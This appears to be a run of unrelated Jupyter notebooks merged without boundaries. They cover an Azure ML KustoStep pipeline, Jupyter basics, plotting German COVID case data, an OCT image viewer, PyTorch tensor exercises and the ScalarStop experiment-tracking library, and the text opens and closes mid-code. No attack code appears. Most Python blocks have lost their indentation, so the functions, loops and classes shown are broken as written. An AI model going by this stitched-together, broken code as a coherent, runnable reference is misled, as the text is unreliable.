config = KustoCompute.attach_configuration(resource_group=ws.resource_group, workspace_name=ws.name,
resource_id=resource_id, tenant_id=tenant_id,
kusto_connection_string=kusto_connection_string,
application_id=application_id, application_key=application_key)
kusto_compute=ComputeTarget.attach(ws, compute_name, config)
kusto_compute.wait_for_completion(True)
```
## Setup output
To use Kusto as a compute target for Azure Machine Learning Pipeline, a KustoStep is used. Currently KustoStep only supports uploading results to Azure Blob store. Let's define an output datastore via PipelineData to be used in KustoStep.
```
from azureml.pipeline.core import PipelineParameter
# Use the default blob storage
def_blob_store = Datastore.get(ws, "workspaceblobstore")
print('Datastore {} will be used'.format(def_blob_store.name))
step_1_output = PipelineData("output", datastore=def_blob_store)
```
# Add a KustoStep to Pipeline
Adds a Kusto query as a step in a Pipeline.
- **name:** Name of the Module
- **compute_target:** Name of Kusto compute target
- **database_name:** Name of the database to perform Kusto query on
- **query_directory:** Path to folder that contains only a text file with Kusto queries (see [here](https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/) for more details on Kusto queries).
- If the query is parameterized, then the text file must also include any declaration of query parameters (see [here](https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/queryparametersstatement?pivots=azuredataexplorer) for more details on query parameters declaration statements).
- An example of the query text file could just contain the query "StormEvents | count | as HowManyRecords;", where StormEvents is the table name.
    - Note: the text file should just contain the declarations and queries without quotation marks around them.
- **outputs:** Output binding to an Azure Blob Store.
- **parameter_dict (optional):** Dictionary that contains the values of parameters declared in the query text file in the **query_directory** mentioned above.
- Dictionary key is the parameter name, and dictionary value is the parameter value.
- For example, parameter_dict = {"paramName1": "paramValue1", "paramName2": "paramValue2"}
- **allow_reuse (optional):** Whether the step should reuse previous results when run with the same settings/inputs (defaults to False)
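As a hedged sketch (the directory and file names here are hypothetical), a query directory could be prepared like this, using the StormEvents example query from above:

```python
import os

# Hypothetical directory and file names; KustoStep only requires that the
# folder contain a single text file with the declarations and queries.
query_directory = "kusto_queries"
os.makedirs(query_directory, exist_ok=True)
with open(os.path.join(query_directory, "query.txt"), "w") as f:
    f.write("StormEvents | count | as HowManyRecords;")
```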
```
database_name = "<database_name>" # Name of the database to perform Kusto queries on
query_directory = "<query_directory>" # Path to folder that contains a text file with Kusto queries
kustoStep = KustoStep(
name='KustoNotebook',
compute_target=compute_name,
database_name=database_name,
query_directory=query_directory,
output=step_1_output,
)
```
# Build and submit the Experiment
```
steps = [kustoStep]
pipeline = Pipeline(workspace=ws, steps=steps)
pipeline_run = Experiment(ws, 'Notebook_demo').submit(pipeline)
pipeline_run.wait_for_completion()
```
# View Run Details
```
from azureml.widgets import RunDetails
RunDetails(pipeline_run).show()
```
# Cells
### Markdown (text) cells
You can
- Write __rich__ly _formatted_ `notes`
- Display equations and derivations, inline $\alpha^2 = 15x$, or not
$$
E = m\,c^2
$$
- Embed plots, images, video, HTML, ...
It's a great place for data exploration and logging your research progress next to your code.
```
from IPython.display import Image
Image(url='http://i.telegraph.co.uk/multimedia/archive/02830/cat_2830677b.jpg', width=300)
```
### Code cells
Code cells allow you to write and execute Python code in blocks. This is a bit nicer than the standard interpreter, where you have to do it line-by-line. This is especially helpful when you have to re-run some code -- you can just re-run the whole cell, instead of running each line independently. To run the code, use:
* Shift + Enter : Runs cell and moves to the next cell
* Ctrl + Enter : Runs cell, stays in cell
In the backend, code cells use the IPython interpreter, and thus have all of the same magic functions, tab completion, and extra help features that we have already seen.
```
for i in range(4):
print('cool')
```
Jupyter / IPython also provide some extra features over the standard interpreter:
```
# Bash commands: add ! at the start of the line
!ls -l
# Help
int?
# "Magic" functions
%timeit range(100)
%lsmagic
```
An example: code profiling
```
import numpy as np
def force(xyz):
return -xyz / np.sum(xyz**2, axis=0)[None]**1.5
%%prun -s cumulative
xyz = np.random.normal(size=(3, 1024))
F = np.zeros_like(xyz)
for i in range(xyz.shape[1]):
F[:,i] = force(xyz).sum()
```
# Plots
#### In a separate window
```
%matplotlib qt5
import matplotlib.pyplot as plt
plt.plot(range(10))
plt.show()
```
#### Kind-of interactive plots
_(restart kernel before running)_
```
import matplotlib.pyplot as plt
%matplotlib notebook
plt.plot(range(10));
```
#### Inline plots: static images
_(restart kernel before running)_
```
import matplotlib.pyplot as plt
%matplotlib inline
plt.plot(range(10));
```
# Widgets
More info: https://github.com/ipython/ipython-in-depth/tree/master/examples/Interactive%20Widgets
```
from ipywidgets import interact, fixed
import ipywidgets as widgets
def f(x):
return x
interact(f, x=10);
from astropy.modeling.functional_models import Gaussian1D
def plot_gaussian(fig, stddev):
v = Gaussian1D(stddev=stddev)
grid = np.linspace(-8, 8, 1024)
plt.plot(grid, v(grid))
plt.draw()
fig, ax = plt.subplots(1,1)
interact(plot_gaussian, fig=fixed(fig),
stddev=widgets.FloatSlider(1., min=0.1, max=10.,
continuous_update=False))
```
# Connecting an IPython console to an existing kernel
```
%connect_info
```
Now go to your terminal, type:
`jupyter console --existing`
and define a variable, say:
`a = 15.`
```
print(a)
```
# Pretty display of objects
```
from astropy.constants import G
class KeplerPotential(object):
def __init__(self, m):
self.m = m
def acceleration(self, xyz):
r = np.sqrt(np.sum(xyz**2, axis=0))
        return -G * self.m * xyz / r[None]**3
def _repr_latex_(self):
return (r'$\Phi(r) = -\frac{G \, m}{r};'
+ r'\quad m={:.1e}$'.format(self.m))
pot = KeplerPotential(1.5e10)
pot
```
<a href="https://colab.research.google.com/github/CloseChoice/FlatCurver/blob/dev/data_analysis/notebooks/Corona.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Loading
```
import pandas as pd
import numpy as np
import plotly.express as px
import plotly.graph_objects as go
from plotly.subplots import make_subplots
url = 'https://raw.githubusercontent.com/CloseChoice/FlatCurver/dev/data/Coronavirus.history.v2.csv'
url_pop = 'https://raw.githubusercontent.com/CloseChoice/FlatCurver/dev/data/einwohner_bundeslaender.csv'
url_rki_neuinfektionen = 'https://raw.githubusercontent.com/CloseChoice/FlatCurver/dev/data/RKI_Neuinfektionen_pro_land_pro_tag.csv'
url_rki_todesfaelle = 'https://raw.githubusercontent.com/CloseChoice/FlatCurver/dev/data/RKI_Todesfaelle_pro_land_pro_tag.csv'
data = pd.read_csv(url)
df_ger = data.loc[data['parent'] == 'Deutschland'].copy()
df_infek = pd.read_csv(url_rki_neuinfektionen)
df_todesfaelle = pd.read_csv(url_rki_todesfaelle)
pop = pd.read_csv(url_pop, sep='\t')
df_ger = pd.merge(df_ger, pop.set_index('Bundesland'), left_on='label', right_index=True, how='left')
df_ger = df_ger.loc[df_ger['label'] != 'Repatriierte', :].copy()
df_todesfaelle.Altersgruppe.unique()
```
# Mapbox
```
fig = px.scatter_mapbox(df_ger, lat="lat", lon="lon", size="confirmed", animation_frame='date',
color_continuous_scale=px.colors.cyclical.IceFire)
fig.update_layout(mapbox_style="open-street-map").update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',
'paper_bgcolor': 'rgba(0, 0, 0, 0)',
'mapbox': {'pitch': 10, 'zoom': 5}})
fig.show()
fig = px.density_mapbox(df_ger, lat='lat', lon='lon', z='confirmed', radius=50, animation_frame='date', zoom=5, range_color=[0, max(df_ger['confirmed'])], height=800)
fig.update_layout(mapbox_style="open-street-map").update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',
'paper_bgcolor': 'rgba(0, 0, 0, 0)',
'mapbox': {'pitch': 10, 'zoom': 5}})
fig.show()
```
# Plots
```
fig = px.line(df_ger, x='date', y='confirmed', color='label')
fig.show()
fig = px.line(df_ger, x='date', y='confirmed', color='label', log_y=True)
fig.show()
```
# W.I.P.
```
df_bundesweit = df_ger.groupby('date').sum().reset_index()
fig = px.line(df_bundesweit, x='date', y='confirmed', log_y=True)
fig.show()
```
## TODO
* Add functions for marker
* Add Date to Mapbox
```
df_bundesweit = df_ger.groupby('date').sum().reset_index()
fig = make_subplots(rows=1, cols=2, specs=[[{"type": "mapbox"}, {"type": "xy"}]])
fig.add_trace(go.Densitymapbox(lat=df_ger['lat'], lon=df_ger['lon'], z=df_ger['confirmed']), row=1, col=1).update_layout(mapbox_style="open-street-map", mapbox_center_lon=11,
mapbox_center_lat=50).update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',
'paper_bgcolor': 'rgba(0, 0, 0, 0)',
'mapbox': {'pitch': 10, 'zoom': 5}})
fig.add_trace(go.Scatter(x=df_bundesweit['date'], y=df_bundesweit['confirmed'], name='Bundesweit'), row=1, col=2)
fig.update_layout(height=800, showlegend=False, title_text='Bundesweite Entwicklung',
updatemenus=[
dict(active=0,
buttons=list([
dict(
args=[{'yaxis': {'type': 'linear'}}],
label="Linear",
method="relayout"
),
dict(
args=[{'yaxis': {'type': 'log'}}],
label="Log",
method="relayout"
)
]),
direction="down",
pad={"r": 10, "t": 10},
showactive=True,
xanchor="left",
yanchor="top",
x=0,
y=1.075,
),
]
)
fig.show()
```
# Tutorial 10: Editing the editsettings.ini using the .ofd viewer
```
#Import required system libraries for file management
import sys,importlib,os
# Provide path to oct-cbort library
module_path=os.path.abspath('C:\\Users\SPARC_PSOCT_MGH\Documents\GitHub\oct-cbort')
if module_path not in sys.path:
sys.path.append(module_path)
# Import oct-cbort library
from oct import *
```
Within the view module lie two types of viewers:
1) OFDView - For unprocessed, raw .ofd data, serving the purpose of optimizing the editsettings.ini before running the processing over the entire volume.
2) MGHView - A multi-dimensional slicer that uses binary memory mapping to access any view of the outputted data.
Here we will look at the first, *.ofd viewer.
### OFDView
```
# Put any directory here
directory = 'G:\\Damon\Damon_Temp_test\[p.D8_9_4_19][s.baseline][09-04-2019_09-07-30]'
# put whatever processing states you want to visualize on the fly
state = 'struct+angio+ps+hsv'
viewer = OFDView(directory, state)
viewer.run()
```
<img src="resources/ofdview_snapshot.png">
### Viewing before processing!
A fun aspect of using the GPU is that we can process things very fast. This allows us to actually scroll through all the frames processing them nearly on the fly.
### Saving a smaller index range in Z
Using the low and high inputs on the left input area, below all the processed image types, you can change the crop size of the processed image. The cropping is done early on in the processing, at the tomogram stage, which ultimately allows for faster processing and smaller output file sizes.
### Quick Projection of the structure dataset
By performing serious downsampling in 3D on the fringes, we can generate a quick projection of the structure using the "Quick Projection" button at the bottom, just to make sure we don't miss anything with our processing range!
### Outputting new editsettings.ini files
Change the settings, update them in the data object by clicking Update, and then generate the new editsettings.ini file using the button in the top right of the GUI.
**Remember, this editsettings.ini file will not be used until it is placed in the settings folder.**
## Accessing the viewer from CMD
### 1. Using python -m oct , button in middle right hand side
<img src="resources/cmd_snapshot.png" width="600"> <img src="resources/simplegui_snapshot.png" width="400">
### 2. Using the python -m oct.view ofd
e.g. > python -m oct.view ofd G:\Damon\Damon_Temp_test\OA_Rotation\[p.SPARC][s.oa_test_2_180][08-09-2019_09-55-50] struct+angio+ps
# 2. Introduction to tensors
Free after [Deep Learning with PyTorch, Eli Stevens, Luca Antiga, and Thomas Viehmann](https://www.manning.com/books/deep-learning-with-pytorch)
```
%%HTML
<style>
th {
font-size: 24px
}
td {
font-size: 16px
}
</style>
from intro_to_pytorch import test
import torch
from matplotlib import pyplot as plt
import numpy as np
import seaborn as sns
sns.set_theme(style="ticks")
```
## Key concepts of this section
1. A `Tensor` is a `View` onto a `Storage`
2. `contiguous` memory layout enables fast computations
3. `broadcasting`: expand Tensor dimensions as needed
## Fundamentals
### Contrast to python list
<!--  -->
<div align="center">
<img src="../img/memory.svg" width="1200px" alt="in pytorch, a tensor refers to numbers in memory that are all next to each other">
</div>
| entity | plain python | pytorch|
|:-------|:------------:|:------:|
| numbers | **boxed**: objects with reference counting | 32 bit numbers|
| lists | sequential (1dim) collections of pointers to python objects | **adjacent entries in memory**: optimized for computational operations |
| interpreter | slow list and math operations | fast |
### Instantiation
Default type at instantiation is torch.float32
```
a = torch.ones(3); print(a, a.dtype)
b = torch.zeros((3, 2)).short(); print(b)
c = torch.tensor([1.,2.,3.], dtype=torch.double); print(c)
torch.tensor??
```
### Tensors and storages
* the `torch.Storage` is where the numbers actually are
* A `torch.Tensor` is a view onto a *torch.Storage*
```
a = torch.tensor([1,2,3,4,5,6])
b = a.reshape((3,2))
assert id(a.storage()) == id(b.storage())
```
* layout of the storage is always *1D*
* hence, changing the value in the storage changes the values of all views (i.e. torch.Tensor) that refer to the same storage
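A quick check (a minimal sketch) that two views really do share one storage:

```python
import torch

a = torch.tensor([1, 2, 3, 4, 5, 6])
b = a.reshape(3, 2)                   # a new view onto the same storage
a[0] = 99                             # mutate through one view...
assert b[0, 0].item() == 99           # ...and the other view sees it
assert a.data_ptr() == b.data_ptr()   # same underlying memory address
```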
### Size, storage offset, and strides
<div align="center">
<img src="../img/tensor.svg" width="1200px" alt="Meaning of size, offset and stride">
</div>
* A Tensor is a view on a storage that is defined by its
* **size:** `t.size()` / `t.shape`
  * **storage offset:** `t.storage_offset()`
* **stride:** `t.stride()`
* the **stride** informs how many elements in the storage one needs to move to get to the next value in that dimension
* to get `t[i,j]`, get `storage_offset + i * stride[0] + j * stride[1]` of storage
* this makes some tensor operations very cheap, because a new tensor has the same storage but different values for size, offset and stride
```
a = torch.tensor([[1,2,3], [4,5,6]])
print(f"a.size: {a.size()}")
print(f"a.storage_offset: {a.storage_offset()}")
print(f"a.stride: {a.stride()}")
b = a[1]
print(f"b.size: {b.size()}")
print(f"b.storage_offset: {b.storage_offset()}")
print(f"b.stride: {b.stride()}")
```
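The index arithmetic described above can be verified directly: the flat storage position of `t[i, j]` is the storage offset plus `i * stride[0] + j * stride[1]`:

```python
import torch

t = torch.tensor([[1, 2, 3], [4, 5, 6]])
i, j = 1, 2
flat = t.storage_offset() + i * t.stride()[0] + j * t.stride()[1]
# For this contiguous tensor, reading the flattened data at `flat`
# gives the same element as the 2D index.
assert t.reshape(-1)[flat].item() == t[i, j].item()  # both are 6
```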
#### Transposing a tensor
* the transpose just swaps entries in size and stride
<div align="center">
<img src="../img/transpose.svg" width="1200px" alt="Transpose explained">
</div>
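A minimal check that transposing only swaps the stride entries while the storage stays shared:

```python
import torch

a = torch.tensor([[1, 2, 3], [4, 5, 6]])
b = a.t()                              # transpose: no data is copied
assert a.stride() == (3, 1)
assert b.stride() == (1, 3)            # stride entries swapped
assert a.data_ptr() == b.data_ptr()    # same storage underneath
```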
#### Contiguous
* A tensor whose values are laid out in the storage starting from the right most dimension onward is **contiguous**
* e.g. 2D tensor:
* `t.size() # torch.Size([#rows, #columns])`
* moving along rows (i.e. fix row, go from one column to the next) is equivalent to going through storage one by one
* this data locality improves performance
```
a = torch.tensor([[1,2,3], [4,5,6]])
assert a.is_contiguous()
b = a.t()
assert not b.is_contiguous()
c = b.contiguous()
assert c.is_contiguous()
```
### Numeric types
* `torch.floatXX`: 32: float, 64: double, 16: half
* `torch.intXX`: 8, 16, 32, 64
* `torch.uint8`: torch.ByteTensor
* `torch.Tensor`: equivalent to torch.FloatTensor
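A few quick checks of the numeric types listed above:

```python
import torch

t16 = torch.zeros(3, dtype=torch.int16)      # a 16-bit integer tensor
assert t16.dtype == torch.int16
assert torch.ones(2).dtype == torch.float32  # default floating type
assert torch.tensor([1], dtype=torch.uint8).type() == 'torch.ByteTensor'
assert torch.Tensor([1.0]).dtype == torch.float32  # torch.Tensor is a FloatTensor
```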
## Exercise 1:
Create a tensor `a` from `list(range(9))`. Predict then check what the size, offset, and strides are.
```
a = torch.tensor(range(9))
test.test_attributes(a)
```
## Exercise 2:
Create a tensor `b = a.view(3, 3)`. What is the value of `b[1,1]`?
```
b = a.view(3, 3)
b[1,1]
```
## Exercise 3:
Create a tensor `c = b[1:,1:]`. Predict then check what the size, offset, and strides are.
```
c = b[1:,1:]
test.test_attributes(c)
```
# Indexing and Broadcasting
## Indexing
* similar to [numpy indexing](https://numpy.org/devdocs/user/basics.indexing.html), e.g. `points[1:, 0]`: all but first rows, first column
#### Tips and tricks
```
# Pairwise indexing works
t = torch.tensor(range(1, 10)).reshape(3, -1)
diagonal = t[range(3), range(3)]
diagonal
# Inject additional dimensions with indexing
t = torch.rand((3, 64, 64))
# Index with `None` at second dim to `unsqueeze`.
assert t[:, None].shape == torch.Size([3, 1, 64, 64])
# Do it multiple times
assert t[:, None, : , None].shape == torch.Size([3, 1, 64, 1, 64])
# Can also use ellipsis
assert t[..., None].shape == torch.Size([3, 64, 64, 1])
```
## Exercise 4:
Get the diagonal elements of `t.rand(3, 3)` by reshaping into a 1d tensor and taking every fourth element, starting from the first.
```
t = torch.rand(3,3)
diag_actual = t.reshape(-1)[::4]  # every fourth element of the flattened tensor
test.test_indexing(t, diag_actual)
```
## Broadcasting
Look at the examples below and think about why we can multiply two tensors of different shapes and get the result that one would expect?
```
a = torch.tensor([
3
])
b = torch.tensor([
1, 2, 3
])
torch.allclose(a*b, torch.tensor([
3, 6, 9
]))
a = torch.tensor([
[1, 2],
[3, 4]
])
b = torch.tensor([
1, 2
])
torch.allclose(a*b, torch.tensor([
[1, 4],
[3, 8]
]))
```
The answer is that PyTorch magically *expands* the shape of the tensors in a smart way such that operations can be performed.
→ This is called **broadcasting**.
### How is broadcasting done?
1. Compare the dimensions of all tensors, starting from the trailing one.
2. If dims are the same, do nothing
3. If one dim is 1 (or missing), expand it to match the other dim.
4. Else: abort
**Note:** When broadcasting, PyTorch does not actually need to expand the dimensions of a tensor in memory in order to perform efficient tensor operations.
```
Example 1
[a]: 3 x 64 x 64
[b]: 1
[a*b]: 3 x 64 x 64
Example 2
[a]: 3 x 1 x 64
[b]: 1 x 64 x 1
[a*b]: 3 x 64 x 64
```
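The note above can be made concrete with `expand`, which creates a broadcast view whose new dimension has stride 0, so no memory is copied:

```python
import torch

b = torch.tensor([1., 2., 3.])        # shape: (3,)
e = b.expand(4, 3)                    # broadcast view, shape: (4, 3)
assert e.stride() == (0, 1)           # stride 0: all rows reuse the same memory
assert e.data_ptr() == b.data_ptr()   # nothing was copied
```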
## Exercise 5 - Broadcasting:
Write down the shapes of the tensors in the examples and convince yourself that the output shape is as expected.
```
a = torch.rand((3,64,64))
b = torch.rand(1)
(a*b).shape
a = torch.rand((3,1,64))
b = torch.rand((1,64,1))
(a*b).shape
```
# Organize your machine learning experiments with ScalarStop
### What is ScalarStop?
ScalarStop helps you train machine learning models by:
* creating a system to uniquely name datasets, model
architectures, trained models, and their
hyperparameters.
* saving and loading datasets and models to/from the
filesystem in a consistent way.
* recording dataset and model names, hyperparameters, and
training metrics to a SQLite or PostgreSQL database.
### Installing ScalarStop
ScalarStop is [available on PyPI](https://pypi.org/project/scalarstop/). You can install it from
the command line using:

    pip3 install scalarstop
### Getting started
First, we will organize your training, validation, and test sets with subclasses of a `DataBlob` objects.
Second, we will describe the architecture of your machine learning models with subclasses of `ModelTemplate` objects.
Third, we'll create a `Model` subclass instance that initializes a model with a `ModelTemplate` and trains it on a `DataBlob`'s training and validation sets.
Finally, we will save the hyperparameters and training metrics from many `DataBlob`s, `ModelTemplate`s, and `Model`s into a SQLite or PostgreSQL database using the `TrainStore` client.
But first, let's import the modules we'll need for this demo.
```
import os
import scalarstop as sp
import tensorflow as tf
```
### Table of Contents
#### 1. [**DataBlob**: Keeping your training dataset organized](#DataBlob:-Keeping-your-training-dataset-organized)
#### 2. [**ModelTemplate**: Parameterizing your model creation](#ModelTemplate:-Parameterizing-your-model-creation)
#### 3. [**Model**: Combine your ModelTemplate with your DataBlob](#Model:Combine-your-ModelTemplate-with-your-DataBlob)
#### 4. [**TrainStore**: Save and query your training metrics in a database](#TrainStore:-Save-and-query-your-machine-learning-metrics-in-a-database)
---
### `DataBlob`: Keeping your training dataset organized
The first step to training machine learning models with ScalarStop is to encase your dataset into a `DataBlob`.
A `DataBlob` is a set of three `tf.data.Dataset` pipelines--representing your training, validation, and test sets.
When you create a `DataBlob`, variables that affect the creation of the `tf.data.Dataset` pipeline are stored in a nested Python dataclass named `Hyperparams`. Only store simple JSON-serializable types in the `Hyperparams` dataclass.
Creating a new `DataBlob` with `Hyperparams` looks roughly like this:
```python
from typing import List, Dict
import scalarstop as sp
class my_datablob_group_name(sp.DataBlob):
@sp.dataclass
class Hyperparams(sp.HyperparamsType):
a: int
b: str
c: Dict[str, float]
        d: List[int]
# ... more setup below ...
```
Then, we define three methods on our `DataBlob` subclass:
- `set_training()`
- `set_validation()`
- `set_test()`
Each one of them has to create a *new* instance of a `tf.data.Dataset` pipeline with data samples and labels zipped together. Typically that looks like:
```python
# Create a tf.data.Dataset for your training samples.
samples = tf.data.Dataset.from_tensor_slices([1, 2, 3])
# And another tf.data.Dataset for your training labels.
labels = tf.data.Dataset.from_tensor_slices([0, 1, 0])
# And zip them together.
tf.data.Dataset.zip((samples, labels))
```
Do not apply any batching at this stage. We will do that later.
Now we'll create a `DataBlob` that contains the Fashion MNIST dataset.
```
class fashion_mnist_v1(sp.DataBlob):
@sp.dataclass
class Hyperparams(sp.HyperparamsType):
num_training_samples: int
def __init__(self, hyperparams):
"""
You only need to override __init__ if you want to validate
your hyperparameters or add arguments that are not hyperparameters.
One example of a non-hyperparameter argument would be a
database connection URL.
"""
if hyperparams["num_training_samples"] > 50_000:
raise ValueError("num_training_samples should be <= 50_000")
super().__init__(hyperparams=hyperparams)
(self._train_images, self._train_labels), \
(self._test_images, self._test_labels) = \
tf.keras.datasets.fashion_mnist.load_data()
def set_training(self) -> tf.data.Dataset:
"""The training set."""
samples = tf.data.Dataset.from_tensor_slices(
self._train_images[:self.hyperparams.num_training_samples]
)
labels = tf.data.Dataset.from_tensor_slices(
self._train_labels[:self.hyperparams.num_training_samples]
)
return tf.data.Dataset.zip((samples, labels))
def set_validation(self) -> tf.data.Dataset:
"""
The validation set.
In this example, the validation set does not change with the
hyperparameters. This allows us to compare results with
different training sets to the same validation set.
However, if your hyperparameters specify how to engineer
        features, then you might want the validation set and
training set to rely on the same hyperparameters.
"""
samples = tf.data.Dataset.from_tensor_slices(
self._train_images[50_000:]
)
labels = tf.data.Dataset.from_tensor_slices(
self._train_labels[50_000:]
)
return tf.data.Dataset.zip((samples, labels))
def set_test(self) -> tf.data.Dataset:
"""The test set. Used to evaluate models but not train them."""
samples = tf.data.Dataset.from_tensor_slices(
self._test_images
)
labels = tf.data.Dataset.from_tensor_slices(
self._test_labels
)
return tf.data.Dataset.zip((samples, labels))
```
Here we create a `DataBlob` instance with a dictionary to set our `Hyperparams`.
The `DataBlob` name is computed by hashing your `DataBlob` subclass class name and the names and values of your `Hyperparams`.
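ScalarStop's exact naming scheme is internal, but the idea of a content-derived name can be sketched with the standard library (the `content_name` helper and the use of SHA-256 here are our assumptions, not ScalarStop's actual implementation):

```python
import hashlib
import json

def content_name(class_name: str, hyperparams: dict) -> str:
    # Serialize the hyperparams deterministically (sorted keys) and
    # hash them together with the subclass name.
    payload = json.dumps({"class": class_name, "hyperparams": hyperparams},
                         sort_keys=True)
    digest = hashlib.sha256(payload.encode()).hexdigest()[:10]
    return f"{class_name}-{digest}"

# The same class name and hyperparams always produce the same name...
assert content_name("fashion_mnist_v1", {"num_training_samples": 10}) == \
       content_name("fashion_mnist_v1", {"num_training_samples": 10})
# ...while changing a hyperparameter changes the name.
assert content_name("fashion_mnist_v1", {"num_training_samples": 10}) != \
       content_name("fashion_mnist_v1", {"num_training_samples": 50})
```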
```
datablob1 = fashion_mnist_v1(hyperparams=dict(num_training_samples=10))
datablob1.name
```
The `DataBlob` group name is by default the `DataBlob` subclass name.
```
datablob1.group_name
print(datablob1.hyperparams)
```
Now we create another `DataBlob` instance with a different value for `Hyperparams`.
Note that it has a different automatically-generated `name`, but it'll have the same `group_name`.
```
datablob2 = fashion_mnist_v1(hyperparams=dict(num_training_samples=50))
datablob2.name, datablob2.group_name
datablob1.training.take(1)
```
We can save a DataBlob to the filesystem and load it back later.
```
os.makedirs("datablobs_directory", exist_ok=True)
datablob1.save("datablobs_directory")
```
Here, we use the classmethod `from_filesystem()` to calculate the exact path of our saved `DataBlob` using a copy of the `DataBlob`'s hyperparameters.
```
loaded_datablob1 = fashion_mnist_v1.from_filesystem(
hyperparams=dict(num_training_samples=10),
datablobs_directory="datablobs_directory",
)
loaded_datablob1
```
Alternatively, if we know the exact directory path of our saved `DataBlob`, we can load it with `from_exact_path()`.
```
loaded_datablob2 = fashion_mnist_v1.from_exact_path(
os.path.join("datablobs_directory", datablob1.name)
)
loaded_datablob2
```
---
### `ModelTemplate`: Parameterizing your model creation
The `ModelTemplate` follows the same concept as the `DataBlob`, but instead of three `tf.data.Dataset` pipelines, the `ModelTemplate` creates a machine learning framework model object.
Here is an example of creating a Keras model. Building and compiling the model is parameterized by values in the `Hyperparams` dataclass.
```
class small_dense_10_way_classifier_v1(sp.ModelTemplate):
@sp.dataclass
class Hyperparams(sp.HyperparamsType):
hidden_units: int
optimizer: str = "adam"
def new_model(self):
model = tf.keras.Sequential(
layers=[
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(
units=self.hyperparams.hidden_units,
activation="relu",
),
tf.keras.layers.Dense(units=10)
],
name=self.name,
)
model.compile(
optimizer=self.hyperparams.optimizer,
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=["accuracy"],
)
return model
```
Once again, the `ModelTemplate` has a unique name generated by hashing your subclass and the `Hyperparams`.
```
model_template = small_dense_10_way_classifier_v1(hyperparams=dict(hidden_units=3))
model_template.name
```
---
### `Model`: Combine your `ModelTemplate` with your `DataBlob`
`DataBlob`s and `ModelTemplate`s are not very useful until you bring them together with a `Model`.
A `Model` is an object created by pairing together a `ModelTemplate` instance and a `DataBlob` instance, for the purpose of training the machine learning model created by the `ModelTemplate` on the `DataBlob`'s training and validation sets.
Make sure to batch your `DataBlob` before using it.
```
datablob = datablob2.batch(2)
model = sp.KerasModel(
datablob=datablob,
model_template=model_template,
)
```
Once again, the `Model` has a unique name. But this time it is just a concatenation of the `DataBlob` and `ModelTemplate` names.
```
model.name
model.fit(final_epoch=2, verbose=1)
```
In ScalarStop, training a machine learning model is an idempotent operation. Instead of saying, "Train for $n$ **more** epochs," we say, "Train until the model has been trained for $n$ epochs **total**."
If we call `model.fit()` again with `final_epoch` still set to 2, we get the same metrics back, but no additional training happens.
```
model.fit(final_epoch=2, verbose=1)
```
Training ScalarStop `Model`s is idempotent because each `Model` keeps track of how many epochs it has been trained for and of the generated training metrics (e.g. loss, accuracy, etc.). This information is saved to the filesystem when you call `model.save()` and is loaded back from disk when you create a new `Model` object with `Model.from_filesystem()` or `Model.from_filesystem_or_new()`.
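The bookkeeping behind idempotent training can be sketched as follows; this is our illustration of the idea, not ScalarStop's actual internals:

```python
class IdempotentTrainer:
    """Minimal sketch: train *until* final_epoch, not *for* n more epochs."""

    def __init__(self):
        self.current_epoch = 0

    def fit(self, final_epoch: int) -> int:
        # Only run the epochs that have not happened yet.
        epochs_to_run = max(0, final_epoch - self.current_epoch)
        for _ in range(epochs_to_run):
            self.current_epoch += 1  # one (pretend) training epoch
        return epochs_to_run

trainer = IdempotentTrainer()
assert trainer.fit(final_epoch=2) == 2  # trains 2 epochs
assert trainer.fit(final_epoch=2) == 0  # already there: a no-op
assert trainer.fit(final_epoch=5) == 3  # trains only the 3 missing epochs
```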
```
os.makedirs("models_directory", exist_ok=True)
model.save("models_directory")
os.listdir("models_directory")
```
Here we load the model back, calculating the exact path from the hyperparameters of both the `DataBlob` and the `ModelTemplate`.
```
model2 = sp.KerasModel.from_filesystem(
datablob=datablob,
model_template=model_template,
models_directory="models_directory",
)
print(model2.name)
model2.history
```
If you provide `models_directory` as an argument to `fit()`, ScalarStop will save the model to the filesystem after every epoch.
```
_ = model2.fit(final_epoch=5, verbose=1, models_directory="models_directory")
```
Once again, ScalarStop saves the model's training history alongside the model's weights, but this is not very convenient if you want to do large-scale analysis on the training metrics of many models at once.
A better way of storing the training metrics is to use the `TrainStore`.
---
### `TrainStore`: Save and query your machine learning metrics in a database
The `TrainStore` is a client that saves hyperparameters and training metrics to a SQLite or PostgreSQL database. Let's create a new `TrainStore` instance that will save data to a file named `train_store.sqlite3`.
```
train_store = sp.TrainStore.from_filesystem(filename="train_store.sqlite3")
train_store
```
The `TrainStore` is also available as a Python context manager.
```python
with sp.TrainStore.from_filesystem(filename="train_store.sqlite3") as train_store:
# use the TrainStore here
# here the TrainStore database connection is automatically closed for you.
```
We don't use it that way in this example because we want to use the TrainStore across multiple Jupyter notebook cells.
And if we want to connect to a PostgreSQL database, the syntax looks like:
```python
connection_string = "postgresql://username:password@hostname:port/database"
with sp.TrainStore(connection_string=connection_string) as train_store:
# ...
```
The `TrainStore` will automatically save your `DataBlob` and `ModelTemplate` name, group name, and hyperparameters to the database. And when you train a `Model`, the `TrainStore` will persist the model name and the epoch training metrics.
All of this happens automatically if you pass the `TrainStore` instance to `Model.fit()`.
```
_ = model.fit(final_epoch=5, train_store=train_store)
```
Once you have some information in the `TrainStore`, you can query it for information and receive results as a Pandas `DataFrame`.
First, let's list the `DataBlob`s that we have saved:
```
train_store.list_datablobs()
```
...and the `ModelTemplate`s that we have saved:
```
train_store.list_model_templates()
```
...and the models that we have trained:
```
train_store.list_models()
```
...and this is how we query for the training history for a given model:
```
train_store.list_model_epochs(model_name=model.name)
model_template_2 = small_dense_10_way_classifier_v1(hyperparams=dict(hidden_units=5))
model_2 = sp.KerasModel(datablob=datablob, model_template=model_template_2)
_ = model_2.fit(final_epoch=10, train_store=train_store)
train_store.list_model_epochs(model_name=model_2.name)
```
```
from pathlib import Path
import nibabel as nib
import numpy as np
from tqdm import tqdm
import sys
sys.path.append("/home/jovyan/P1-Temp-Reg/notebooks")
import mathplus_p1_auxiliary_functions as aux
root_path = Path("/mnt/materials/SIRF/MathPlusBerlin/DATA/ACDC-Daten/")
fpath_output = Path("/home/jovyan/InputData/")
fpath_output.mkdir(exist_ok=True, parents=True)
def get_subdirs(path: Path):
